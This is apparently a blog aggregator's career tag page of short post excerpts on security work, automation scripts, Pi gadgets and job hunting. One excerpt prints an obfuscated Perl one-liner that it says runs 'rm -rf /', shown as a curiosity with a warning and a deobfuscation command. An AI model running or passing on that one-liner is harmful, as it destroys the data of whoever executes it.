We’re used to hearing success stories that start at the very beginning, with obstacles to overcome and a steady progression toward a lesson learned. But what if we started with… The post Eglė’s story: Can facing challenges head-on drive career growth? appeared first on Hostinger Blog.
#career
34 posts
30 Apr 2025
11 Feb 2024
For the first time ever, I was laid off, and had to find a new software developer job. I managed to find a new one, but it took longer than I thought, and it was a lot of work. I … Continue reading →
26 Mar 2023
This article explores the multifaceted definition of a senior software engineer. It covers the technical skills like going a level deeper and having a broad understanding, as well as soft skills like communication, autonomy, business acumen, and leadership. It provides tips on how to grow, such as pair programming and content creation. The path to seniority requires dedication, perseverance and…
20 Jul 2022
Aptitude is the ability to perform a type of work. Tenure is the length of time in job. Their correlation degrades rapidly.
15 Sept 2019
I often get contacted by recruiters asking if I am interested in changing company. Even if I am happy where I am, I briefly check out companies I have not heard of before. One reason is that you never know, … Continue reading →
5 Nov 2017
Like most security professionals I am spending a large amount of time helping my company move securely to AWS. Certificate management in AWS is done with AWS Certificate Manager and while they do offer *free* certificates, ACM generated certs are outside your direct control. You don’t get the keys which, at least for some things, should probably be a non-starter…
14 Jul 2017
Security summer camp is about a week away so I spent some time this afternoon trying to figure out what talks and events I want to make sure I attend. BSides Las Vegas: A Day in the Life of a Product Security Incident Response Manager From SOC to CSIRT Hadoop Safari : Hunting For Vulnerabilities Introduction to Reversing and Pwning…
12 Jun 2017
Often while doing research I need temporary access to a bunch of different virtual machines. While it is possible to do this on my Macbook using VMWare Fusion or Virtualbox the overhead seems unnecessary for something I will delete in under a week. My goto solution is a virtualization stack of: 16GB DigitalOcean Droplet + Wok + Kimchi Here is…
29 Apr 2017
Recently I started looking at the Umbrella DNS Popularity List and did a blog post about it here. The data seemed valuable and lacking at the same time so I spent my *limited* free time this week learning about R and RStudio. Protip: If you want to play along at home there is an RStudio docker container so all you…
25 Apr 2017
Cisco offers a daily list of the million most queried domain names from Umbrella (OpenDNS) users. I had some time this weekend so decided to spend some time playing around with the data to see what I could find so I spun up a lightsail server and got to work. Grabbing the file is as simple as: wget http://s3-us-west-1.amazonaws.com/umbrella-static/top-1m.csv.zip You…
3 Apr 2017
I am a big fan of DigiCert for TLS Certificates and CA/WebPKI services. While they have amazing customer support and are an amazing company to work with, there are not a lot of automation scripts to interact with their API available. So over the weekend and with a lot of help from Clint Wilson I built a shell script that:…
31 Mar 2017
An amazing mentor and leader I work with has been talking to me recently about what real leadership looks like and shared with me a list of quotes he keeps on his desk that his dad who had a leadership role in the military collected and gave to him. He gave me a copy and said I was free to…
12 Mar 2017
Here are my thoughts on programmer career planning. You should always stay employable, mostly by changing jobs regularly (every five years or so). When changing, don’t wait until you have to. Your negotiating position is much better when you can … Continue reading →
19 Jan 2017
I was at dinner on Tuesday with 6 security professionals and I proposed this hypothetical situation and I thought it was worth writing up and sharing. Background: Six identical safes with $1,000,000 inside are being built into the side of a public building and are being randomly assigned to everyone at the dinner. At the end of 90 days any…
22 Dec 2016
I had a coach whose favorite quote was “Pain is the best teacher.” and that was the first thing that popped into my head this morning when I realized that I had left an $80 a month Digital Ocean Droplet running for an extra 3 weeks after I got done using it. To be honest $60 isn’t *that* painful but…
20 Dec 2016
What will 2017 hold for the security industry? I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor. A bored VP of Marketing with a paypal account, a six pack and a nephew who can get him on…
4 Dec 2016
I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin), XRDP and Mate in a computer on a stick configuration. This way I have a full (as I want it to be) Kali installation with me as long as I have…
30 Nov 2016
I have been playing with my stack of piZero’s recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget. So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky. Building it is fairly straight forward but if you if you…
26 Nov 2016
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use…
13 Nov 2016
In the last two years Burp Suite Proxy has become my go to web application security scanner. As with everything recently if I can automate it, I do. So this weekend I built a simple script to scan a website with Burp, create a PDF report and post it to Slack: Here is how I set it up: Create a…
9 Nov 2016
I have recently been automating a lot of my technical security tasks and building slack bots around them and it was w3af‘s turn. W3af is an amazing open source web application security scanner that my friend Andres Riancho writes and maintains. The goal of this project was to build scheduled and automated scans of my web properties with pdf reporting…
5 Nov 2016
As I have talked about before “You can’t defend what you dont know exists” so today while sitting around and trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to slack: Configuration is amazingly easy. I run a copy of this on a $5 a month Digitalocean Droplet for an external…
4 Nov 2016
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans)…
20 Oct 2016
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet : sudo…
17 Oct 2016
Earlier this week someone sent me this one line perl script (that you shouldn’t run): perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Due to some really clever code obfuscation it runs rm -rf /. You can deobfuscate (is that word?) with this: perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"' While trying to figure out how this code code I stumbled upon…
5 Oct 2016
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500…
25 Aug 2016
One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great. I have been using a tool called websnort for…
25 Jul 2016
I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss. I ended up with these 16 talks I am going to make a special point to see next week: BSidesLV Managing…
18 Jul 2016
Security Summer Camp (BSidesLV, Blackhat and Defcon) is the most important week in the security industry and as such you need to be prepared to network like a professional. Here are 6 things you can do this week to get ready: Freshen Up Your Social Media Profiles Is your twitter profile picture 4 years old? Does your twitter bio mention…
10 Jul 2016
There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one. I am a huge fan of the Streisand privacy stack because it includes and L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package. The problem with Streisand…
9 Jul 2016
I worked with a consultant using the lair framework two years ago and since then I have been a huge fan of the project to manage pentest information. Tom Steele has done an amazing job with the project but it has been a pain to install but thanks to Ryan Hanson and Docker you can now setup a lair instance…
23 Jun 2016
A picture started floating around the internet of Mark Zuckerberg holding an Instagram cutout: People almost instantly started to notice that his webcam and mic were taped over. While Mark Zuckerberg isnt exactly known for having great security practices, all his social media passwords were Dadada. This started a discussion in the office if someone could really spy on you…
20 Jun 2016
While rebuilding my iPad this weekend I noticed that I could name it an emoji. So I named my iPad 📱(U+1F4F1): While I don’t have any problem using the iPad it basically makes it unreachable on the network via hostname. From there I renamed all of my lab machines emojis. Mostly variations of 💩 (U+1F4A9) because I am sophomoric: In…
8 Dec 2014
This week I will give a presentation at a local high school on what it is like to work as a programmer. I am volunteering (through the organization Transfer) to come to schools and talk about what I work with. … Continue reading →